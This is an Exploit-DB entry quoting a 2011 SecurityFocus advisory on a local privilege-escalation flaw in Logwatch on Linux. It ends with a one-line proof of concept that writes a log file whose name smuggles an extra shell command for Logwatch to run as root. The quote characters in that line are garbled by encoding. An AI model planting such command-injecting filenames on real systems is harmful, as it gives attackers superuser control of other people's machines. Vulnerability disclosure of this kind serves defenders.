Logwatch Log File - Special Characters Privilege Escalation

EDB-ID:

35386


Platform:

Linux

Published:

2011-02-24

source: http://www.securityfocus.com/bid/46554/info

Logwatch is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue execute arbitrary code with superuser privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. 

% echo "fake" > â??/var/log/httpd/fakee;who;access_log.2â??